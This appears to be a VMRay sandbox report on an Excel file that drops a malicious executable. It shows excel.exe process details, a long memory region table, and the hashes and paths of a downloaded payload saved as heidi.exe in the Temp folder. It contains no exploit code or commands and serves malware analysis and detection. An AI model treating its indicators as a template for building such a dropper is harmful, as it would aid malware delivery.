Excel File Drops Malicious Payload (2018-02-13) | Sequential Behavior
Try VMRay Analyzer
Monitored Processes
Behavior Information - Sequential View
Process #1: excel.exe
(Host: 89, Network: 1)
+
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\office12\excel.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:01:34, Reason: Analysis Target
Unmonitor End Time: 00:03:39, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
+
Information Value
PID 0x930
Parent PID 0x44c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Groups
  • XABNCPUWKW\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000de82 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9B4
0x 9B0
0x 9AC
0x 9A8
0x 9A4
0x 9A0
0x 99C
0x 998
0x 994
0x 990
0x 98C
0x 988
0x 980
0x 97C
0x 974
0x 964
0x 95C
0x 958
0x 950
0x 94C
0x 948
0x 944
0x 934
0x 9C8
0x 9CC
0x 9D0
0x 9D4
0x 9D8
0x 9DC
0x 9E0
0x 9E4
0x A38
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00022fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True True False
pagefile_0x0000000000080000 0x00080000 0x00082fff Pagefile Backed Memory Readable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True True False
locale.nls 0x001d0000 0x00236fff Memory Mapped File Readable False False False
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True True False
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True True False
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x00287fff Private Memory Readable, Writable True True False
private_0x0000000000290000 0x00290000 0x00290fff Private Memory Readable, Writable True True False
private_0x00000000002a0000 0x002a0000 0x002affff Private Memory - True True False
private_0x00000000002b0000 0x002b0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory Readable, Writable True True False
private_0x00000000002d0000 0x002d0000 0x0034ffff Private Memory Readable, Writable True True False
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory - True True False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x0039ffff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003affff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x003bffff Private Memory Readable, Writable True True False
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True True False
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True True False
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True True False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x0040ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable True False False
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000440000 0x00440000 0x00441fff Pagefile Backed Memory Readable True False False
private_0x0000000000450000 0x00450000 0x0054ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000870000 0x00870000 0x01c6ffff Pagefile Backed Memory Readable True False False
xlintl32.dll 0x01c70000 0x01e19fff Memory Mapped File Readable False False False
private_0x0000000001e20000 0x01e20000 0x01e2ffff Private Memory Readable, Writable True True False
private_0x0000000001e30000 0x01e30000 0x01e3ffff Private Memory Readable, Writable True True False
private_0x0000000001e40000 0x01e40000 0x01e4ffff Private Memory Readable, Writable True True False
office.odf 0x01e50000 0x02089fff Memory Mapped File Readable False False False
private_0x0000000002090000 0x02090000 0x020affff Private Memory Readable, Writable True True False
pagefile_0x00000000020b0000 0x020b0000 0x020b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000020c0000 0x020c0000 0x020c0fff Pagefile Backed Memory Readable True False False
private_0x00000000020d0000 0x020d0000 0x0210ffff Private Memory Readable, Writable True True False
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002150000 0x02150000 0x0222efff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02230000 0x024fefff Memory Mapped File Readable False False False
private_0x0000000002500000 0x02500000 0x02500fff Private Memory Readable, Writable True True False
pagefile_0x0000000002510000 0x02510000 0x02510fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000002520000 0x02520000 0x02520fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002530000 0x02530000 0x0253ffff Private Memory Readable, Writable True True False
private_0x0000000002540000 0x02540000 0x0254ffff Private Memory Readable, Writable True True False
private_0x0000000002550000 0x02550000 0x0255ffff Private Memory Readable, Writable True True False
private_0x0000000002560000 0x02560000 0x0256ffff Private Memory Readable, Writable True True False
private_0x0000000002570000 0x02570000 0x025affff Private Memory Readable, Writable True True False
staticcache.dat 0x025b0000 0x02edffff Memory Mapped File Readable False False False
private_0x0000000002ee0000 0x02ee0000 0x02eeffff Private Memory Readable, Writable True True False
private_0x0000000002ef0000 0x02ef0000 0x02efffff Private Memory Readable, Writable True True False
private_0x0000000002f00000 0x02f00000 0x02f3ffff Private Memory Readable, Writable True True False
private_0x0000000002f40000 0x02f40000 0x02f40fff Private Memory Readable, Writable True True False
pagefile_0x0000000002f50000 0x02f50000 0x02f56fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000002f60000 0x02f60000 0x02f61fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002f70000 0x02f70000 0x02f70fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002f80000 0x02f80000 0x02fbffff Private Memory Readable, Writable True True False
private_0x0000000002fc0000 0x02fc0000 0x02fcffff Private Memory Readable, Writable True True False
private_0x0000000002fd0000 0x02fd0000 0x02fdffff Private Memory Readable, Writable True True False
private_0x0000000002fe0000 0x02fe0000 0x030dffff Private Memory Readable, Writable True True False
private_0x00000000030e0000 0x030e0000 0x0315ffff Private Memory Readable, Writable True True False
private_0x0000000003160000 0x03160000 0x0325ffff Private Memory Readable, Writable True True False
private_0x0000000003260000 0x03260000 0x0326ffff Private Memory Readable, Writable True True False
private_0x0000000003270000 0x03270000 0x0327ffff Private Memory Readable, Writable True True False
private_0x0000000003280000 0x03280000 0x0337ffff Private Memory Readable, Writable True True False
private_0x0000000003380000 0x03380000 0x0338ffff Private Memory Readable, Writable True True False
private_0x0000000003390000 0x03390000 0x0339ffff Private Memory Readable, Writable True True False
private_0x00000000033a0000 0x033a0000 0x033affff Private Memory Readable, Writable True True False
private_0x00000000033b0000 0x033b0000 0x033bffff Private Memory Readable, Writable True True False
private_0x00000000033c0000 0x033c0000 0x033cffff Private Memory Readable, Writable True True False
private_0x00000000033d0000 0x033d0000 0x033dffff Private Memory Readable, Writable True True False
private_0x00000000033e0000 0x033e0000 0x033effff Private Memory Readable, Writable True True False
private_0x00000000033f0000 0x033f0000 0x033fffff Private Memory Readable, Writable True True False
private_0x0000000003400000 0x03400000 0x0340ffff Private Memory Readable, Writable True True False
private_0x0000000003410000 0x03410000 0x03411fff Private Memory Readable, Writable True True False
private_0x0000000003420000 0x03420000 0x0342ffff Private Memory Readable, Writable True True False
private_0x0000000003430000 0x03430000 0x0352ffff Private Memory Readable, Writable True True False
private_0x0000000003530000 0x03530000 0x03530fff Private Memory Readable, Writable True True False
private_0x0000000003540000 0x03540000 0x03545fff Private Memory Readable, Writable True True False
private_0x0000000003550000 0x03550000 0x0355efff Private Memory Readable, Writable True True False
private_0x0000000003560000 0x03560000 0x03560fff Private Memory Readable, Writable True True False
private_0x0000000003570000 0x03570000 0x0357ffff Private Memory Readable, Writable True True False
private_0x0000000003580000 0x03580000 0x035bffff Private Memory Readable, Writable, Executable True True False
private_0x00000000035c0000 0x035c0000 0x035c8fff Private Memory Readable, Writable True True False
private_0x00000000035d0000 0x035d0000 0x035d8fff Private Memory Readable, Writable True True False
private_0x00000000035e0000 0x035e0000 0x035effff Private Memory Readable, Writable True True False
private_0x00000000035f0000 0x035f0000 0x035f8fff Private Memory Readable, Writable True True False
private_0x0000000003600000 0x03600000 0x0363ffff Private Memory Readable, Writable, Executable True True False
pagefile_0x0000000003640000 0x03640000 0x03a32fff Pagefile Backed Memory Readable True False False
private_0x0000000003a40000 0x03a40000 0x03a4ffff Private Memory Readable, Writable True True False
private_0x0000000003a50000 0x03a50000 0x03a5ffff Private Memory Readable, Writable True True False
private_0x0000000003a60000 0x03a60000 0x03a6ffff Private Memory Readable, Writable True True False
pagefile_0x0000000003a70000 0x03a70000 0x03a70fff Pagefile Backed Memory Readable True False False
private_0x0000000003a80000 0x03a80000 0x03a8ffff Private Memory Readable, Writable True True False
private_0x0000000003a90000 0x03a90000 0x03a9ffff Private Memory Readable, Writable True True False
private_0x0000000003aa0000 0x03aa0000 0x03aaffff Private Memory Readable, Writable True True False
pagefile_0x0000000003ab0000 0x03ab0000 0x03ab0fff Pagefile Backed Memory Readable True False False
private_0x0000000003ac0000 0x03ac0000 0x03ac0fff Private Memory Readable, Writable True True False
private_0x0000000003ad0000 0x03ad0000 0x03ad0fff Private Memory Readable, Writable True True False
private_0x0000000003ae0000 0x03ae0000 0x03ae0fff Private Memory Readable, Writable True True False
private_0x0000000003af0000 0x03af0000 0x03af0fff Private Memory Readable, Writable True True False
private_0x0000000003af0000 0x03af0000 0x03afffff Private Memory Readable, Writable True True False
private_0x0000000003b00000 0x03b00000 0x03b3ffff Private Memory Readable, Writable True True False
private_0x0000000003b40000 0x03b40000 0x03b7ffff Private Memory Readable, Writable True True False
private_0x0000000003b80000 0x03b80000 0x03bbffff Private Memory Readable, Writable True True False
pagefile_0x0000000003bc0000 0x03bc0000 0x03bc2fff Pagefile Backed Memory Readable True False False
private_0x0000000003bd0000 0x03bd0000 0x03bdffff Private Memory Readable, Writable True True False
private_0x0000000003be0000 0x03be0000 0x03bebfff Private Memory Readable, Writable True True False
pagefile_0x0000000003bf0000 0x03bf0000 0x03bf1fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000003c00000 0x03c00000 0x03c00fff Pagefile Backed Memory Readable True False False
private_0x0000000003c10000 0x03c10000 0x03d0ffff Private Memory Readable, Writable True True False
private_0x0000000003d10000 0x03d10000 0x03e0ffff Private Memory Readable, Writable True True False
private_0x0000000003e10000 0x03e10000 0x03f0ffff Private Memory Readable, Writable True True False
wdmaud.drv.mui 0x03f10000 0x03f10fff Memory Mapped File Readable, Writable False False False
mmdevapi.dll.mui 0x03f20000 0x03f20fff Memory Mapped File Readable, Writable False False False
private_0x0000000003f30000 0x03f30000 0x03f31fff Private Memory Readable, Writable True True False
private_0x0000000003f40000 0x03f40000 0x03f4ffff Private Memory - True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db 0x03f50000 0x03f73fff Memory Mapped File Readable True False False
pagefile_0x0000000003f80000 0x03f80000 0x03f80fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000003f90000 0x03f90000 0x03fcffff Private Memory Readable, Writable True True False
pagefile_0x0000000003fd0000 0x03fd0000 0x03fd1fff Pagefile Backed Memory Readable True False False
comdlg32.dll.mui 0x03fe0000 0x03fecfff Memory Mapped File Readable, Writable False False False
pagefile_0x0000000003ff0000 0x03ff0000 0x03ff1fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000004000000 0x04000000 0x04001fff Pagefile Backed Memory Readable True False False
private_0x0000000004010000 0x04010000 0x04010fff Private Memory Readable, Writable True True False
private_0x0000000004020000 0x04020000 0x04022fff Private Memory Readable, Writable True True False
private_0x0000000004020000 0x04020000 0x04020fff Private Memory Readable, Writable True True False
private_0x0000000004020000 0x04020000 0x0402ffff Private Memory - True True False
private_0x0000000004030000 0x04030000 0x04032fff Private Memory Readable, Writable True True False
private_0x0000000004030000 0x04030000 0x04031fff Private Memory Readable, Writable True True False
private_0x0000000004040000 0x04040000 0x0407ffff Private Memory Readable, Writable True True False
private_0x0000000004080000 0x04080000 0x04082fff Private Memory Readable, Writable True True False
private_0x0000000004080000 0x04080000 0x04080fff Private Memory Readable, Writable True True False
private_0x0000000004090000 0x04090000 0x0418ffff Private Memory Readable, Writable True True False
private_0x0000000004190000 0x04190000 0x0428ffff Private Memory Readable, Writable True True False
private_0x0000000004290000 0x04290000 0x04290fff Private Memory Readable, Writable True True False
private_0x00000000042a0000 0x042a0000 0x042a2fff Private Memory Readable, Writable True True False
private_0x00000000042a0000 0x042a0000 0x042bffff Private Memory Readable, Writable True True False
private_0x00000000042b0000 0x042b0000 0x042bffff Private Memory Readable, Writable True True False
private_0x00000000042c0000 0x042c0000 0x042c1fff Private Memory Readable, Writable True True False
private_0x00000000042c0000 0x042c0000 0x042c2fff Private Memory Readable, Writable True True False
cversions.2.db 0x042d0000 0x042d3fff Memory Mapped File Readable True False False
private_0x00000000042e0000 0x042e0000 0x042e0fff Private Memory Readable, Writable True True False
private_0x00000000042e0000 0x042e0000 0x042e3fff Private Memory Readable, Writable True True False
private_0x00000000042f0000 0x042f0000 0x0432ffff Private Memory Readable, Writable True True False
private_0x0000000004330000 0x04330000 0x0442ffff Private Memory Readable, Writable True True False
private_0x0000000004430000 0x04430000 0x04831fff Private Memory Readable, Writable True True False
private_0x0000000004840000 0x04840000 0x04851fff Private Memory Readable, Writable True True False
private_0x0000000004860000 0x04860000 0x04871fff Private Memory Readable, Writable True True False
private_0x0000000004880000 0x04880000 0x04880fff Private Memory Readable, Writable True True False
private_0x0000000004880000 0x04880000 0x04880fff Private Memory Readable, Writable True True False
private_0x0000000004890000 0x04890000 0x04890fff Private Memory Readable, Writable True True False
private_0x0000000004890000 0x04890000 0x04890fff Private Memory Readable, Writable True True False
private_0x00000000048a0000 0x048a0000 0x048e7fff Private Memory Readable, Writable True True False
private_0x00000000048f0000 0x048f0000 0x04937fff Private Memory Readable, Writable True True False
private_0x0000000004940000 0x04940000 0x04940fff Private Memory Readable, Writable True True False
private_0x0000000004950000 0x04950000 0x04950fff Private Memory Readable, Writable True True False
private_0x0000000004960000 0x04960000 0x04960fff Private Memory Readable, Writable True True False
private_0x0000000004970000 0x04970000 0x049affff Private Memory Readable, Writable True True False
private_0x00000000049b0000 0x049b0000 0x049b0fff Private Memory Readable, Writable True True False
private_0x00000000049c0000 0x049c0000 0x049cffff Private Memory Readable, Writable True True False
private_0x00000000049d0000 0x049d0000 0x04acffff Private Memory Readable, Writable True True False
private_0x0000000004ad0000 0x04ad0000 0x04bcffff Private Memory Readable, Writable True True False
private_0x0000000004b50000 0x04b50000 0x04b53fff Private Memory Readable, Writable True True False
private_0x0000000004b60000 0x04b60000 0x04b7ffff Private Memory Readable, Writable True True False
private_0x0000000004b80000 0x04b80000 0x04b82fff Private Memory Readable, Writable True True False
private_0x0000000004bb0000 0x04bb0000 0x04bb3fff Private Memory Readable, Writable True True False
private_0x0000000004bc0000 0x04bc0000 0x04bc3fff Private Memory Readable, Writable True True False
private_0x0000000004bf0000 0x04bf0000 0x04c2ffff Private Memory Readable, Writable True True False
private_0x0000000004c30000 0x04c30000 0x04c30fff Private Memory Readable, Writable True True False
private_0x0000000004c40000 0x04c40000 0x04c40fff Private Memory Readable, Writable True True False
private_0x0000000004c50000 0x04c50000 0x04c50fff Private Memory Readable, Writable True True False
private_0x0000000004c60000 0x04c60000 0x04c60fff Private Memory Readable, Writable True True False
private_0x0000000004c70000 0x04c70000 0x04c70fff Private Memory Readable, Writable True True False
private_0x0000000004c80000 0x04c80000 0x04c80fff Private Memory Readable, Writable True True False
private_0x0000000004c90000 0x04c90000 0x04c90fff Private Memory Readable, Writable True True False
private_0x0000000004ca0000 0x04ca0000 0x04ca0fff Private Memory Readable, Writable True True False
private_0x0000000004cb0000 0x04cb0000 0x04daffff Private Memory Readable, Writable True True False
private_0x0000000004e00000 0x04e00000 0x04e00fff Private Memory Readable, Writable True True False
private_0x0000000004e00000 0x04e00000 0x04e02fff Private Memory Readable, Writable True True False
private_0x0000000004e10000 0x04e10000 0x04e10fff Private Memory Readable, Writable True True False
private_0x0000000004e20000 0x04e20000 0x04e5ffff Private Memory Readable, Writable True True False
private_0x0000000004e20000 0x04e20000 0x04e2ffff Private Memory Readable, Writable True True False
private_0x0000000004e40000 0x04e40000 0x04e4ffff Private Memory - True True False
private_0x0000000004e50000 0x04e50000 0x04e50fff Private Memory Readable, Writable True True False
private_0x0000000004ed0000 0x04ed0000 0x04ed0fff Private Memory Readable, Writable True True False
private_0x0000000004f00000 0x04f00000 0x04f00fff Private Memory Readable, Writable, Executable True True False
private_0x0000000004f10000 0x04f10000 0x04f17fff Private Memory Readable, Writable True True False
private_0x0000000004f10000 0x04f10000 0x04f1ffff Private Memory - True True False
private_0x0000000004f50000 0x04f50000 0x04f53fff Private Memory Readable, Writable True True False
private_0x0000000004f60000 0x04f60000 0x04f9ffff Private Memory Readable, Writable True True False
private_0x0000000004fb0000 0x04fb0000 0x04fb1fff Private Memory Readable, Writable, Executable True True False
private_0x0000000004fc0000 0x04fc0000 0x050bffff Private Memory Readable, Writable True True False
private_0x00000000050c0000 0x050c0000 0x052bffff Private Memory Readable, Writable True True False
private_0x00000000052c0000 0x052c0000 0x052c0fff Private Memory Readable, Writable True True False
private_0x00000000052d0000 0x052d0000 0x052d1fff Private Memory Readable, Writable True True False
private_0x00000000052d0000 0x052d0000 0x052d3fff Private Memory Readable, Writable True True False
private_0x00000000052e0000 0x052e0000 0x052e8fff Private Memory Readable, Writable True True False
private_0x00000000052e0000 0x052e0000 0x052e3fff Private Memory Readable, Writable True True False
private_0x00000000052f0000 0x052f0000 0x0532ffff Private Memory Readable, Writable True True False
private_0x0000000005330000 0x05330000 0x05332fff Private Memory Readable, Writable True True False
private_0x0000000005330000 0x05330000 0x05333fff Private Memory Readable, Writable True True False
private_0x0000000005340000 0x05340000 0x05342fff Private Memory Readable, Writable True True False
private_0x0000000005340000 0x05340000 0x05343fff Private Memory Readable, Writable True True False
private_0x0000000005350000 0x05350000 0x0538ffff Private Memory Readable, Writable True True False
private_0x0000000005390000 0x05390000 0x053cffff Private Memory Readable, Writable True True False
private_0x00000000053d0000 0x053d0000 0x0540ffff Private Memory Readable, Writable True True False
private_0x0000000005410000 0x05410000 0x05413fff Private Memory Readable, Writable True True False
private_0x0000000005430000 0x05430000 0x0546ffff Private Memory Readable, Writable True True False
private_0x0000000005480000 0x05480000 0x05483fff Private Memory Readable, Writable True True False
private_0x0000000005490000 0x05490000 0x05493fff Private Memory Readable, Writable True True False
private_0x00000000054a0000 0x054a0000 0x054a3fff Private Memory Readable, Writable True True False
private_0x00000000054b0000 0x054b0000 0x055affff Private Memory Readable, Writable True True False
private_0x00000000055b0000 0x055b0000 0x055b3fff Private Memory Readable, Writable True True False
private_0x00000000055c0000 0x055c0000 0x055c3fff Private Memory Readable, Writable True True False
private_0x00000000055d0000 0x055d0000 0x056cffff Private Memory Readable, Writable True True False
private_0x00000000056d0000 0x056d0000 0x0570ffff Private Memory Readable, Writable True True False
private_0x0000000005710000 0x05710000 0x0580ffff Private Memory Readable, Writable True True False
private_0x0000000005810000 0x05810000 0x05813fff Private Memory Readable, Writable True True False
private_0x0000000005820000 0x05820000 0x05823fff Private Memory Readable, Writable True True False
private_0x0000000005830000 0x05830000 0x0586ffff Private Memory Readable, Writable True True False
private_0x0000000005870000 0x05870000 0x05873fff Private Memory Readable, Writable True True False
private_0x0000000005880000 0x05880000 0x05883fff Private Memory Readable, Writable True True False
private_0x00000000058a0000 0x058a0000 0x058dffff Private Memory Readable, Writable True True False
index.dat 0x058e0000 0x058e7fff Memory Mapped File Readable, Writable True True False
private_0x00000000058f0000 0x058f0000 0x059effff Private Memory Readable, Writable True True False
index.dat 0x059f0000 0x05a07fff Memory Mapped File Readable, Writable True True False
private_0x0000000005a10000 0x05a10000 0x05a4ffff Private Memory Readable, Writable True True False
private_0x0000000005ad0000 0x05ad0000 0x05b0ffff Private Memory Readable, Writable True True False
index.dat 0x05b10000 0x05b1bfff Memory Mapped File Readable, Writable True True False
private_0x0000000005b20000 0x05b20000 0x05c1ffff Private Memory Readable, Writable True True False
private_0x0000000005c20000 0x05c20000 0x05e1ffff Private Memory Readable, Writable True True False
private_0x0000000005c20000 0x05c20000 0x05cbffff Private Memory Readable, Writable, Executable True True False
private_0x0000000005c80000 0x05c80000 0x05cbffff Private Memory Readable, Writable, Executable True True False
private_0x0000000005cf0000 0x05cf0000 0x05cfffff Private Memory Readable, Writable True True False
private_0x0000000005de0000 0x05de0000 0x05e8ffff Private Memory Readable, Writable True True False
private_0x0000000005eb0000 0x05eb0000 0x05eeffff Private Memory Readable, Writable True True False
private_0x0000000005f00000 0x05f00000 0x05f3ffff Private Memory Readable, Writable True True False
private_0x0000000005f10000 0x05f10000 0x05f4ffff Private Memory Readable, Writable True True False
private_0x0000000005f80000 0x05f80000 0x0607ffff Private Memory Readable, Writable True True False
private_0x00000000060a0000 0x060a0000 0x060dffff Private Memory Readable, Writable True True False
private_0x0000000006100000 0x06100000 0x0613ffff Private Memory Readable, Writable True True False
private_0x0000000006160000 0x06160000 0x0625ffff Private Memory Readable, Writable True True False
private_0x0000000006320000 0x06320000 0x0641ffff Private Memory Readable, Writable True True False
private_0x0000000006420000 0x06420000 0x0651ffff Private Memory Readable, Writable True True False
private_0x0000000006560000 0x06560000 0x0665ffff Private Memory Readable, Writable True True False
private_0x0000000006d40000 0x06d40000 0x06d7ffff Private Memory Readable, Writable True True False
private_0x0000000006db0000 0x06db0000 0x06deffff Private Memory Readable, Writable True True False
private_0x0000000006e30000 0x06e30000 0x06f2ffff Private Memory Readable, Writable True True False
private_0x0000000006fc0000 0x06fc0000 0x070bffff Private Memory Readable, Writable True True False
private_0x0000000007150000 0x07150000 0x0724ffff Private Memory Readable, Writable True True False
private_0x0000000007250000 0x07250000 0x0764ffff Private Memory Readable, Writable True True False
private_0x0000000007650000 0x07650000 0x0781ffff Private Memory Readable, Writable True True False
private_0x0000000007650000 0x07650000 0x0775ffff Private Memory Readable, Writable True True False
private_0x0000000007650000 0x07650000 0x0773ffff Private Memory Readable, Writable True True False
private_0x0000000007750000 0x07750000 0x0775ffff Private Memory Readable, Writable True True False
private_0x00000000077e0000 0x077e0000 0x0781ffff Private Memory Readable, Writable True True False
private_0x0000000007860000 0x07860000 0x0795ffff Private Memory Readable, Writable True True False
private_0x00000000079e0000 0x079e0000 0x07adffff Private Memory Readable, Writable True True False
private_0x0000000007ae0000 0x07ae0000 0x07c0ffff Private Memory Readable, Writable True True False
private_0x0000000007c10000 0x07c10000 0x07d0ffff Private Memory Readable, Writable True True False
private_0x00000000080c0000 0x080c0000 0x081bffff Private Memory Readable, Writable True True False
private_0x0000000008260000 0x08260000 0x0835ffff Private Memory Readable, Writable True True False
private_0x00000000084c0000 0x084c0000 0x085bffff Private Memory Readable, Writable True True False
private_0x00000000087a0000 0x087a0000 0x087dffff Private Memory Readable, Writable True True False
private_0x00000000087e0000 0x087e0000 0x088dffff Private Memory Readable, Writable True True False
private_0x0000000077760000 0x77760000 0x77859fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077860000 0x77860000 0x7797efff Private Memory Readable, Writable, Executable True True False
private_0x000000007ef68000 0x7ef68000 0x7ef6afff Private Memory Readable, Writable True True False
private_0x000000007ef6b000 0x7ef6b000 0x7ef6dfff Private Memory Readable, Writable True True False
private_0x000000007ef6e000 0x7ef6e000 0x7ef70fff Private Memory Readable, Writable True True False
private_0x000000007ef71000 0x7ef71000 0x7ef73fff Private Memory Readable, Writable True True False
private_0x000000007ef74000 0x7ef74000 0x7ef76fff Private Memory Readable, Writable True True False
private_0x000000007ef77000 0x7ef77000 0x7ef79fff Private Memory Readable, Writable True True False
private_0x000000007ef77000 0x7ef77000 0x7ef79fff Private Memory Readable, Writable True True False
private_0x000000007ef7a000 0x7ef7a000 0x7ef7cfff Private Memory Readable, Writable True True False
private_0x000000007ef7d000 0x7ef7d000 0x7ef7ffff Private Memory Readable, Writable True True False
private_0x000000007ef80000 0x7ef80000 0x7ef82fff Private Memory Readable, Writable True True False
private_0x000000007ef83000 0x7ef83000 0x7ef85fff Private Memory Readable, Writable True True False
private_0x000000007ef86000 0x7ef86000 0x7ef88fff Private Memory Readable, Writable True True False
private_0x000000007ef89000 0x7ef89000 0x7ef8bfff Private Memory Readable, Writable True True False
private_0x000000007ef8c000 0x7ef8c000 0x7ef8efff Private Memory Readable, Writable True True False
private_0x000000007ef8f000 0x7ef8f000 0x7ef91fff Private Memory Readable, Writable True True False
private_0x000000007ef92000 0x7ef92000 0x7ef94fff Private Memory Readable, Writable True True False
private_0x000000007ef95000 0x7ef95000 0x7ef97fff Private Memory Readable, Writable True True False
private_0x000000007ef98000 0x7ef98000 0x7ef9afff Private Memory Readable, Writable True True False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True True False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True True False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True True False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True True False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True True False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
For performance reasons, the remaining 176 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\heidi.exe 717.50 KB (734720 bytes) MD5: a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e
SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac
False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\val[1].exe 717.50 KB (734720 bytes) MD5: a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e
SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac
False
c:\users\kft6utqw\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 96.00 KB (98304 bytes) MD5: 86b0d3bf293c31bdeff2b05ab254a73d
SHA1: 12ba75e806dfe5dcbca7823687f346fa2472ae4e
SHA256: 8c96bbdc62be3d2d80f68c2b2a1bf722bed33b74215ede1b5f49eaca3012eced
False
c:\users\kft6utqw\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: 7c83dbeeb7811a904009ba7d48993c65
SHA1: 2923612b74c7443ffe8a54f4b2d1fe0bd6dae0bb
SHA256: 33e7b8ec336fc1fc62e773ae74239f51b20e756958af32dbfc193a7cfa5f929b
False
